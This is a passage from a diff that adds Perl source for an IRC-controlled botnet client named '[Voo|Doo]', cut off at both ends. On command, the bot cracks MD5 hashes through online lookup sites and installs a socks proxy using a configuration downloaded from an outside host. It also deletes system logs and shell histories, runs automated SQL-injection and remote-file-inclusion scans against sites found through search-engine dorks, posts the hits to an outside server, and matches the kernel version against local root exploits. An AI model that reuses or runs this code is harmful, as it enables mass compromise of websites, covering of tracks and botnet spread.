/g){ + $crack = $1; +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]md5.xpzone.de : $crack"); +}else{ +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]md5.xpzone.de : Hash Not Found."); +} +} + + +sub ben(){ +$hashget = LWP::UserAgent->new; +$resp = $hashget->get("http://md5.benramsey.com/md5.php?hash=$md5"); # checks gdata for hash + $hashans = $resp->content; + if ($hashans =~ m/<\!\[CDATA\[(.+?)\]\]><\/string>/g){ + $crack = $1; +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]md5.benramsey.com : $crack"); +}else{ +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]md5.benramsey.com : Hash Not Found."); +} +} + + +sub alim(){ +$hashget = LWP::UserAgent->new; +$resp = $hashget->get("http://alimamed.pp.ru/md5/?md5e=&md5d=$md5"); # checks gdata for hash + $hashans = $resp->content; + if ($hashans =~ m/(.+?)<\/b>/g){ + $crack = $1; +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]alimamed.pp.ru : $crack"); +}else{ +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]alimamed.pp.ru : Hash Not Found."); +} +} + + +sub cry(){ +$hashget = LWP::UserAgent->new; +$resp = $hashget->get("http://us.md5.crysm.net/find?md5=$md5"); # checks gdata for hash + $hashans = $resp->content; + if ($hashans =~ m/
  • (.+?)<\/li>/g){ + $crack = $1; +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]us.md5.crysm.net : $crack"); +}else{ +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]us.md5.crysm.net : Hash Not Found."); +} +} + + +sub gdataonline(){ +$hashget = LWP::UserAgent->new; +$resp = $hashget->get("http://gdataonline.com/qkhash.php?mode=txt&hash=$md5"); # checks gdata for hash + $hashans = $resp->content; + if ( +$hashans =~ m\width="35%">([ -_a-z0-9.*?&=;<>/""]{1,25})\ +) + +{ + $crack = $1; +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]gdataonline.com : $crack"); +}else{ +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]gdataonline.com : Hash Not Found"); +} +} + + + + + if ($funcarg =~ /^milw0rm/) { + my @ltt=(); + my @bug=(); + my $x; + my $page=""; + my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return; + print $socke "GET http://milw0rm.com/rss.php HTTP/1.0\r\nHost: milw0rm.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; + my @r = <$socke>; + $page="@r"; + close($socke); + while ($page =~ m/(.*)</g){ + $x = $1; + if ($x =~ /\<\;/) { + $x =~ s/\<\;/</g; + } + if ($x !~ /milw0rm/) { + push (@bug,$x); + } + } + while ($page =~ m/<link.*expl.*([0-9]...)</g) { + if ($1 !~ m/milw0rm.com|exploits|en/){ + push (@ltt,"http://www.milw0rm.com/exploits/$1 "); + } + } + sendraw($IRC_cur_socket, "PRIVMSG $printl :9 [Milw0rm] 9:.4 Latest exploits :"); + foreach $x (0..(@ltt - 1)) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :9 [Milw0rm] 9:.4 $bug[$x] - $ltt[$x]"); + sleep 1; + } + } + +##################### +# Chk The News PacketStorm# +###################### +if ($funcarg =~ /^packetstorm/) { + my $c=0; + my $x; + my @ttt=(); + my @ttt1=(); + my $sock = IO::Socket::INET->new(PeerAddr=>"www.packetstormsecurity.org",PeerPort=>"80",Proto=>"tcp") or return; + print $sock "GET /whatsnew20.xml HTTP/1.0\r\n"; + print $sock "Host: www.packetstormsecurity.org\r\n"; + print $sock "Accept: */*\r\n"; + print $sock "User-Agent: Mozilla/5.0\r\n\r\n"; + my @r = <$sock>; + $page="@r"; + close($sock); + while ($page =~ m/<link>(.*)<\/link>/g) + { + push(@ttt,$1); + } + while ($page =~ m/<description>(.*)<\/description>/g) + { + push(@ttt1,$1); + } + foreach $x (0..(@ttt - 1)) + { + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] ".$ttt[$x]." ".$ttt1[$x].""); + sleep 3; + $c++; + } +} +###################### +#Auto Install Socks V5 using Mocks# +###################### +if ($funcarg =~ /^socks5/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Installing Mocks please wait4"); + system 'cd /tmp'; + system 'wget http://switch.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz'; + system 'tar -xvfz mocks-0.0.2.tar.gz'; + system 'rm -rf mocks-0.0.2.tar.gz'; + system 'cd mocks-0.0.2'; + system 'rm -rf mocks.conf'; + system 'curl -O http://andromeda.covers.de/221/mocks.conf'; + system 'touch mocks.log'; + system 'chmod 0 mocks.log'; + sleep(2); + system './mocks start'; + sleep(4); + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Looks like its succesfully installed lets do the last things4 "); + + #lets grab ip + $net = `/sbin/ifconfig | grep 'eth0'`; + if (length($net)) + { + $net = `/sbin/ifconfig eth0 | grep 'inet addr'`; + if (!length($net)) + { + $net = `/sbin/ifconfig eth0 | grep 'inet end.'`; + } + if (length($net)) + { + chop($net); + @netip = split/:/,$net; + $netip[1] =~ /(\d{1,3}).(\d{1,3}).(\d{1,3}).(\d{1,3})/; + $ip = $1 .".". $2 .".". $3 .".". $4; + + #and print it ^^ + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Connect here ". $ip .":8787 "); + } + else + { + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] IP not founded "); + } +} +else +{ + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] ERROR WHILE INSTALLING MOCKS "); +} +} +###################### +# Nmap # +###################### + if ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/){ + my $hostip="$1"; + my $portstart = "$2"; + my $portend = "$3"; + my (@abertas, %porta_banner); + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Port Scan $2-$3"); + foreach my $porta ($portstart..$portend){ + my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime); + if ($scansock) { + push (@abertas, $porta); + $scansock->close; + if ($xstats){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Port-Scan: $porta"."/Open"); + } + } + } + if (@abertas) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Port-Scan Complete "); + } else { + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] No open ports have been founded "); + } + } +###################### +# End of Nmap # +###################### + +if ($funcarg =~ /^killproc\s+(\d+)/){ + + $proc=$1; + open(FILE,"/tmp/pids"); + while(<FILE>) { + $_ =~ /(\d+)\s+(.*)/; + $childs{$1}=$2; + } + close(FILE); + if(defined $childs{$proc}) { + delproc($proc); + `kill -9 $proc`; + sendraw($IRC_cur_socket, "PRIVMSG $printl : [Voo|Doo] Zabijam proces [ $proc ] "); + } else { + sendraw($IRC_cur_socket, "PRIVMSG $printl : [Voo|Doo] Niema takiego procesu "); + } +} + +# wyswietla procesy skanowania +if ($funcarg =~ /^procslist/){ + + open(FILE,"/tmp/pids"); + while(<FILE>) { + $_ =~ /(\d+)\s+(.*)/; + $childs{$1}=$2; + } + close(FILE); + if(scalar keys %childs > 0) { + for $klucz (keys %childs) { + sendraw($IRC_cur_socket, "PRIVMSG $printl : [Voo|Doo] Proces [ $klucz ] By [ $childs{$klucz} ] "); + } + } else { + sendraw($IRC_cur_socket, "PRIVMSG $printl : [Voo|Doo] Brak procesow"); + } +} + +###################### +# Log Cleaner # +###################### +if ($funcarg =~ /^logcleaner/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Log Clean. This process can be long, just wait"); + system 'rm -rf /var/log/lastlog'; + system 'rm -rf /var/log/wtmp'; + system 'rm -rf /etc/wtmp'; + system 'rm -rf /var/run/utmp'; + system 'rm -rf /etc/utmp'; + system 'rm -rf /var/log'; + system 'rm -rf /var/logs'; + system 'rm -rf /var/adm'; + system 'rm -rf /var/apache/log'; + system 'rm -rf /var/apache/logs'; + system 'rm -rf /usr/local/apache/log'; + system 'rm -rf /usr/local/apache/logs'; + system 'rm -rf /root/.bash_history'; + system 'rm -rf /root/.ksh_history'; +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Log Clean. All default log and bash_history files erased"); + sleep 1; +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Log Clean. Now Erasing the rest of the machine log files"); + system 'find / -name *.bash_history -exec rm -rf {} \;'; + system 'find / -name *.bash_logout -exec rm -rf {} \;'; + system 'find / -name "log*" -exec rm -rf {} \;'; + system 'find / -name *.log -exec rm -rf {} \;'; + sleep 1; +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Log Clean. Done! All logs erased"); + } +###################### +# End of Log Cleaner # +###################### +###################### +# SQL SCANNER # +###################### +if ($funcarg =~ /^sql2\s+(.*?)\s+(.*)\s+(\d+)/){ + if (my $pid = fork) { + waitpid($pid, 0); + } else { + if (my $d=fork()) { + addproc($d,"[SQL2] $2"); + exit; + } else { + + my $bug=$1; + my $dork=$2; + my $contatore=0; + my ($type,$space); + my %hosts; + my $columns=$3; + +&Find($dork); + my @links = &GetLink(); + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Stron : ".scalar(@links)); + my @uni = &Unique(@links); + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Wyczyszczono : ".scalar(@uni)); + &Remove(); + + foreach my $sito (@uni) { + + $contatore++; + if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]End: $bug $chiave "); + } + + my $site="http://".$sito.$bug; + #sendraw($IRC_cur_socket, "PRIVMSG $printl :Sprawdzam: $site cols: $columns "); + + $w=int rand(999); + $w=$w*1000; + for($i=1;$i<=$columns;$i++) { + splice(@col,0,$#col+1); + for($j=1;$j<=$i;$j++) { + push(@col,$w+$j); + } + $tmp=join(",",@col); + $test=$site."-1+UNION+SELECT+".$tmp."/*"; + print $test."\n"; + $result=&Query($test,"3"); + $result =~ s/\/\*\*\///g; + $result =~ s/UNION([^(\*)]*)//g; + for($k=1;$k<=$i;$k++) { + $n=$w+$k; + if($result =~ /$n/){ + splice(@col2,0,$#col2+1); + for($s=1;$s<=$i;$s++) { + push(@col2,$s); + } + $tmp2=join(",",@col2); + $test2="+UNION+SELECT+".$tmp2."/*"; + push @{$dane{$test2}},$k; + } + } + } + for $klucz (keys %dane) { + foreach $i(@{$dane{$klucz}}) { + $klucz =~ s/$i/$i/; + } + $ssij = $site."-1".$klucz; + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] ".$ssij." "); + my $ua = LWP::UserAgent->new(); + $ua->agent('Mozilla/5.0'); + my %form = ('sqlbug' => $ssij,); + my $response = $ua->post('http://showtime.boo.pl/index.php', \%form); + } + %dane=(); + #sendraw($IRC_cur_socket, "PRIVMSG @zut :[Voo|Doo] End. "); + } + } + delproc($$); + exit; + } +} +} +####### SQL SCANNER ######### + +if ($funcarg =~ /^string\s+(.*)\s+http\:\/\/(.*?)\/(.*?)\s+(\d+)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (my $d=fork()) { +addproc($d,"[String] $2"); +exit; +} else { + $kto = $1; + $host = $2; + $skrypt = $3; + $czekac=$4; + + #http://ttl.ugu.pl/string/index.php + my $socke = IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>"80",Proto=>"tcp") or return; + print $socke "GET /$skrypt HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; + + my @r = <$socke>; + $page="@r"; + + $page =~ s/!scan(\s+)//g; + $page =~ s/!scan(.)//g; + $page =~ s/\<.*\>//g; + + @lines = split (/\n/, $page); + $ile=scalar(@lines); + + + for($i=9;$i<=$ile;$i+=4) { + + for($j=0;$j<4;$j++) { + #print $lines[$i+$j]."\n"; + + sendraw($IRC_cur_socket, "PRIVMSG $printl :$kto $lines[$i+$j]"); + + sleep 10; + } + + sleep $czekac*60; + } + + } + delproc($$); + exit; + } +} + + + + + +####### SQL SCANNER ######### + +if ($funcarg =~ /^sql\s+(.*)\s+(\d+)/){ + if (my $pid = fork()) { + waitpid($pid, 0); + } else { + if (my $d=fork()) { + addproc($d,"[SQL1] $1 $2"); + exit; + } else { + my $site=$1; + my $columns=$2; + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Sql [Testing]: $site cols: $columns "); + + $w=int rand(999); + $w=$w*1000; + for($i=1;$i<=$columns;$i++) { + splice(@col,0,$#col+1); + for($j=1;$j<=$i;$j++) { + push(@col,$w+$j); + } + $tmp=join(",",@col); + $test=$site.$bug."-1'+UNION+SELECT+".$tmp."/*"; + #$result=query($test); + $result=get_html($test); + + $result =~ s/\/\*\*\///g; + $result =~ s/UNION([^(\*)]*)//g; + for($k=1;$k<=$i;$k++) { + $n=$w+$k; + if($result =~ /$n/){ + splice(@col2,0,$#col2+1); + for($s=1;$s<=$i;$s++) { + push(@col2,$s); + } + $tmp2=join(",",@col2); + $test2="+UNION+SELECT+".$tmp2."/*"; + push @{$dane{$test2}},$k; + } + } + } + for $klucz (keys %dane) { + foreach $i(@{$dane{$klucz}}) { + $klucz =~ s/$i/$i/; + } + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Sql [Sql-Bug]: ".$site.$bug."-1".$klucz." "); + } + # sendraw($IRC_cur_socket, "PRIVMSG $printl :4,16 [ sql ] [ 12Koniec 4 ] "); + } + delproc($$); + exit; + } +} +####### SQL SCANNER ######### +###################### +# Rootable # +###################### +if ($funcarg =~ /^rootable/) { +my $khost = `uname -r`; +my $currentid = `whoami`; +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Currently you are ".$currentid." "); +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] The kernel of this box is ".$khost." "); +chomp($khost); + + my %h; + $h{'w00t'} = { + vuln=>['2.4.18','2.4.10','2.4.21','2.4.19','2.4.17','2.4.16','2.4.20'] + }; + + $h{'brk'} = { + vuln=>['2.4.22','2.4.21','2.4.10','2.4.20'] + }; + + $h{'ave'} = { + vuln=>['2.4.19','2.4.20'] + }; + + $h{'elflbl'} = { + vuln=>['2.4.29'] + }; + + $h{'elfdump'} = { + vuln=>['2.4.27'] + }; + + $h{'expand_stack'} = { + vuln=>['2.4.29'] + }; + + $h{'h00lyshit'} = { + vuln=>['2.6.8','2.6.10','2.6.11','2.6.9','2.6.7','2.6.13','2.6.14','2.6.15','2.6.16','2.6.2'] + }; + + $h{'kdump'} = { + vuln=>['2.6.13'] + }; + + $h{'km2'} = { + vuln=>['2.4.18','2.4.22'] + }; + + $h{'krad'} = { + vuln=>['2.6.11'] + }; + + $h{'krad3'} = { + vuln=>['2.6.11','2.6.9'] + }; + + $h{'local26'} = { + vuln=>['2.6.13'] + }; + + $h{'loko'} = { + vuln=>['2.4.22','2.4.23','2.4.24'] + }; + + $h{'mremap_pte'} = { + vuln=>['2.4.20','2.2.25','2.4.24'] + }; + + $h{'newlocal'} = { + vuln=>['2.4.17','2.4.19','2.4.18'] + }; + + $h{'ong_bak'} = { + vuln=>['2.4.','2.6.'] + }; + + $h{'ptrace'} = { + vuln=>['2.2.','2.4.22'] + }; + + $h{'ptrace_kmod'} = { + vuln=>['2.4.2'] + }; + + $h{'ptrace24'} = { + vuln=>['2.4.9'] + }; + $h{'pwned'} = { + vuln=>['2.4.','2.6.'] + }; + $h{'py2'} = { + vuln=>['2.6.9','2.6.17','2.6.15','2.6.13'] + }; + $h{'raptor_prctl'} = { + vuln=>['2.6.13','2.6.17','2.6.16','2.6.13'] + }; + $h{'prctl3'} = { + vuln=>['2.6.13','2.6.17','2.6.9'] + }; + $h{'remap'} = { + vuln=>['2.4.'] + }; + $h{'rip'} = { + vuln=>['2.2.'] + }; + $h{'stackgrow2'} = { + vuln=>['2.4.29','2.6.10'] + }; + $h{'uselib24'} = { + vuln=>['2.4.29','2.6.10','2.4.22','2.4.25'] + }; + $h{'newsmp'} = { + vuln=>['2.6.'] + }; + $h{'smpracer'} = { + vuln=>['2.4.29'] + }; + $h{'loginx'} = { + vuln=>['2.4.22'] + }; + $h{'exp.sh'} = { + vuln=>['2.6.9','2.6.10','2.6.16','2.6.13'] + }; + $h{'prctl'} = { + vuln=>['2.6.'] + }; + $h{'kmdx'} = { + vuln=>['2.6.','2.4.'] + }; + $h{'raptor'} = { + vuln=>['2.6.13','2.6.14','2.6.15','2.6.16'] + }; + $h{'raptor2'} = { + vuln=>['2.6.13','2.6.14','2.6.15','2.6.16'] + }; +foreach my $key(keys %h){ +foreach my $kernel ( @{ $h{$key}{'vuln'} } ){ + if($khost=~/^$kernel/){ + chop($kernel) if ($kernel=~/.$/); + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Possible Local Root Exploits: ". $key ." "); + } + } +} +} +###################### +# MAILER # +###################### +if ($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Mailer | Sending Mail to : 2 $3"); +$subject = $1; +$sender = $2; +$recipient = $3; +@corpo = $4; +$mailtype = "content-type: text/html"; +$sendmail = '/usr/sbin/sendmail'; +open (SENDMAIL, "| $sendmail -t"); +print SENDMAIL "$mailtype\n"; +print SENDMAIL "Subject: $subject\n"; +print SENDMAIL "From: $sender\n"; +print SENDMAIL "To: $recipient\n\n"; +print SENDMAIL "@corpo\n\n"; +close (SENDMAIL); +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Mailer | Mail Sent To : 2 $recipient"); +} +###################### +# End of MAILER # +###################### +my $responselfi = "./../../../../../../../../etc/passwd"; +my $printcmdlfi = "./../../../../../../../../etc/passwd"; + +if ($funcarg =~ /^auto\s+(.*?)\s+(.*)/){ + if(fork() == 0){ +if (my $d=fork()) { +addproc($d,"[Autoscan] $2"); +exit; +} + my($bug,$dork)=($1,$2); + &autoscan($bug,$dork); + delproc($$); + exit(0); + } +} + +sub autoscan(){ + my @domini = &SiteDomains(); + my($bug,$dork)=@_; + $dork =~ s/[\r\n]//g; + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Scan Start ".$dork); + if($dork =~ /site:/){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Zakazany Dork."); + exit(0); + } + foreach my $Domains(@domini){ + my $auto_dork = $dork."+site:".$Domains; + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Skanuje :".$auto_dork); + &Find($auto_dork); + &Test($bug); + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Scan End: ".$dork); + } +} +sub Find(){ + my $dork = $_[0]; + my @proc; + $proc[0] = fork(); + if($proc[0] == 0){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Google : ".scalar(&Google($dork))); + exit; + } + $proc[1] = fork(); + if($proc[1] == 0){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Yahoo : ".scalar(&Yahoo($dork))); + exit; + } + $proc[2] = fork(); + if($proc[2] == 0){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Baidu : ".scalar(&baidu($dork))); + exit; + } + $proc[3] = fork(); + if($proc[3] == 0){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Gigablast : ".scalar(&Gigablast($dork))); + exit; + } + $proc[4] = fork(); + if($proc[4] == 0){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Msn : ".scalar(&MSN($dork))); + exit; + } + $proc[5] = fork(); + if($proc[5] == 0){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Aol : ".scalar(&Aol($dork))); + exit; + } + $proc[6] = fork(); + if($proc[6] == 0){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] AltaVista : ".scalar(&AltaVista($dork))); + exit; + } + $proc[7] = fork(); + if($proc[7] == 0){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Alltheweb : ".scalar(&Alltheweb($dork))); + exit; + } + $proc[8] = fork(); + if($proc[8] == 0){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Fireball : ".scalar(&fire($dork))); + exit; + } + $proc[9] = fork(); + if($proc[9] == 0){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Uol : ".scalar(&UOL($dork))); + exit; + } + + waitpid($proc[0],0); + waitpid($proc[1],0); + waitpid($proc[2],0); + waitpid($proc[3],0); + waitpid($proc[4],0); + waitpid($proc[5],0); + waitpid($proc[6],0); + waitpid($proc[7],0); + waitpid($proc[8],0); + waitpid($proc[9],0); +} +sub Test(){ + my $counter = 0; + my $bug = $_[0]; + my @links = &GetLink(); + my $test = "http://201.218.196.231/fastspread.txt?"; + my $response = "http://201.218.196.231/fastspread.txt?"; + my $printcmd = "RFI?"; + my @forks; + my $forked++; + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Stron : ".scalar(@links)); + my @uni = &Unique(@links); + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Wyczyszczono : ".scalar(@uni)); + &Remove(); + my $testx = scalar(@uni); + my $startx = 0; + foreach my $site (@uni){ + $counter++; + my $link = "http://".$site.$bug.$test."?"; + my $responser = "http://".$site.$bug.$response."?"; + print($link."\n"); # Prints test links in terminal + if($counter %$exploitcounter == 0){ + my $start = 0; + foreach my $f(@forks){ + waitpid($f,0); + $forks[$start--]; + $start++; + } + $startx = 0; + } + $forks[$startx]=fork(); + if($forks[$startx] == 0){ + my $htmlsite = &Query($link,"3"); + if($htmlsite =~ /kangkung/){ + my $responsing = &Query($responser,"3"); + if($responsing =~ /kangkung/){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Safe Off : "."http://".$site.$bug.$printcmd); + }} + elsif($htmlsite =~ /kangkung/){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] Safe Onn : "."http://".$site.$bug.$printcmd); + } + exit(0); + } + if($counter %150 == 0){ + # &message($channel,"BanTeNHacK SabaR.. lg NyaRi 12kNd 3->  ".$counter." dari ".$testx); + } + $startx++; + } + my $start = 0; + foreach my $f(@forks){ + waitpid($f,0); + $forks[$start--]; + $start++; + } +} +sub SiteDomains(){ + my @dom = ( + "de","nl","be","dk","sk","com","net","org", + "info","uk","se","it","fr","hu","pl","ru", + "ro","be","cz","edu","jp" + ); +} + +sub Google(){ + my($dork)=@_; + $dork=&Key($dork); + my $start; + my $num=100; + my $max=100*10; + my @dom = &GoogleDomains(); + my $file = "/tmp/google.txt"; + my $html; + my @result; + for($start=0;$start < $max; $start += $num){ + my $Domains = $dom[rand(scalar(@dom))]; + $html.=&Query("http://www.google.".$Domains."/search?q=".$dork."&num=".$num."&sa=N&filter=0&start=".$start); + } + while($html =~ m/<h2 class=r><a href=\"http:\/\/(.+?)\"\ class/g){ + $1 =~ /google/ || push(@result,&Links($1,$file)); + } + return(@result); +} + +sub Yahoo(){ + my($dork)=@_; + $dork=&Key($dork); + my $start; + my $num=100; + my $max=100*10; + my $file = "/tmp/yahoo.txt"; + my $html; + my @result; + for($start=0;$start < $max; $start += $num){ + $html.=&Query("http://search.yahooapis.com/WebSearchService/V1/webSearch?appid=SiteSearch&query=".$dork."&results=".$num."&start=".$start); + } + while($html =~ m/<Url>http:\/\/(.+?)\<\/Url>/g){ + $1 =~ /yahoo/ || push(@result,&Links($1,$file)); + } + return(@result); +} + + + + +sub baidu(){ +my @lst; +my $key = $_[0]; +my $pg = 0; + for($i=0; $i<=1000; $i+=10){ +my $lib=("http://www.baidu.com/s?lm=0&si=&rn=10&ie=gb2312&ct=0&wd=".key($key)."&pn=".$start."&ver=0&cl=3"); +my $Res=query($lib); +while($Res =~ m/href=\"http:\/\/(.*?)\"/ig){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + + +sub Alltheweb(){ + my($dork)=@_; + $dork=&Key($dork); + my $start; + my $num=100; + my $max=100*10; + my $file = "/tmp/alltheweb.txt"; + my $html; + my @result; + for($start=0;$start < $max; $start += $num){ + $html.=&Query("http://www.alltheweb.com/search?advanced=1&cat=web&type=all&hits=".$num."&ocjp=1&q=".$dork."&o=".$start); + } + while($html =~ m/<span class=\"resURL\">http:\/\/(.+?)\ /g){ + $1 =~ /alltheweb/ || push(@result,&Links($1,$file)); + } + return(@result); +} + + +sub UOL(){ + my($dork)=@_; + $dork=&Key($dork); + my $start; + my $num=20; + my $max=100*10; + my $file = "/tmp/UOL.txt"; + my $html; + my @result; + for($start=0;$start < $max; $start += $num){ + $html.=&Query("http://busca.uol.com.br/www/index.html?q=".$dork."&start=".$start); + } + while($html =~ m/<a href=\"http:\/\/([^>\"]*)/g){ + $1 =~ /busca|uol|yahoo/ || push(@result,&Links($1,$file)); + } + return(@result); +} + +sub fire(){ + my($dork)=@_; + $dork=&Key($dork); + my $start; + my $num=10; + my $max=100*10; + my $file = "/tmp/fire.txt"; + my $html; + my @result; + for($start=0;$start < $max; $start += $num){ + $html.=&Query("http://suche.fireball.de/cgi-bin/pursuit?pag=".$start."&query=".$dork."&cat=fb_loc&idx=all&enc=utf-8"); + } + while($html =~ m/<a href=\"?http:\/\/(.+?)\//g){ + $1 =~ /msn|live|google|yahoo/ || push(@result,&Links($1,$file)); + } + return(@result); +} + +sub MSN(){ + my($dork)=@_; + $dork=&Key($dork); + my $start; + my $num=10; + my $max=100*10; + my $file = "/tmp/msn.txt"; + my $html; + my @result; + for($start=0;$start < $max; $start += $num){ + $html.=&Query("http://search.live.com/results.aspx?q=".$dork."&first=".$start."&FORM=PERE"); + } + while($html =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ + $1 =~ /msn|live/ || push(@result,&Links($1,$file)); + } + return(@result); +} + + +sub Query(){ + my($link,$timeout)=@_; + my $req=HTTP::Request->new(GET=>$link); + my $ua=LWP::UserAgent->new(); + $ua->agent($User_Agent[rand(scalar(@User_Agent))]); + $ua->timeout($timeout); + my $response=$ua->request($req); + return $response->content; +} + +sub Key(){ + my $key=$_[0]; + $key =~ s/ /\+/g; + $key =~ s/:/\%3A/g; + $key =~ s/\//\%2F/g; + $key =~ s/&/\%26/g; + $key =~ s/\"/\%22/g; + $key =~ s/\\/\%5C/g; + $key =~ s/,/\%2C/g; + return $key; +} + +sub GetLink(){ + my @file = ("/tmp/google.txt","/tmp/yahoo.txt","/tmp/abacho.txt","/tmp/gigablast.txt","/tmp/msn.txt","/tmp/virgilio.txt","/tmp/seekport.txt","/tmp/alltheweb.txt","/tmp/aol.txt","/tmp/UOL.txt","/tmp/fire.txt"); + my $link; + my @total; + foreach my $n (@file){ + open(F,'<',$n); + while($link = <F>){ + $link=~s/[\r\n]//g; + push(@total,$link); + } + close(F); + } + return(@total); +} + +sub Remove(){ + my @file = ("/tmp/google.txt","/tmp/yahoo.txt","/tmp/abacho.txt","/tmp/gigablast.txt","/tmp/msn.txt","/tmp/virgilio.txt","/tmp/seekport.txt","/tmp/alltheweb.txt","/tmp/aol.txt","/tmp/UOL.txt","/tmp/fire.txt"); + foreach my $n (@file){ + system("rm -rf ".$n); + } +} +sub GoogleDomains(){ + my @ret = ( + "ae","com.ar","at","com.au","be","com.br","ca","ch","cl","de","dk","fi","fr","gr","com.hk", + "ie","co.il","it","co.jp","co.kr","lt","lv","nl","com.pa","com.pe","pl","pt","ru","com.sg", + "com.tr","com.tw","com.ua","co.uk","hu" + ); + return(@ret); +} +sub Unique{ + my @Unique = (); + my %seen = (); + foreach my $element ( @_ ){ + next if $seen{ $element }++; + push @Unique, $element; + } + return @Unique; +} +sub Links(){ + my ($link,$file_print) = @_; + $link=~s/http:\/\///g; + my $host = $link; + my $host_dir = $host; + my @links; + $host_dir=~s/(.*)\/[^\/]*$/\1/; + $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; + $host_dir=&End($host_dir); + $host=&End($host); + $link=&End($host); + push(@links,$link,$host,$host_dir); + open($file,'>>',$file_print); + print $file "$link\n$host_dir\n$host\n"; + close($file); + return @links; +} +sub End(){ + $string=$_[0]; + $string.="/"; + $string=~s/\/\//\//; + while($string=~/\/\//){ + $string=~s/\/\//\//; + } + return($string); +} + +sub Agent(){ + my @ret = ( + "Microsoft Internet Explorer/4.0b1 (Windows 95)", + "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)", + "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)", + "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)", + "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)", + "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)", + "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)", + "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)", + "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)", + "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)", + "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)", + "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)", + 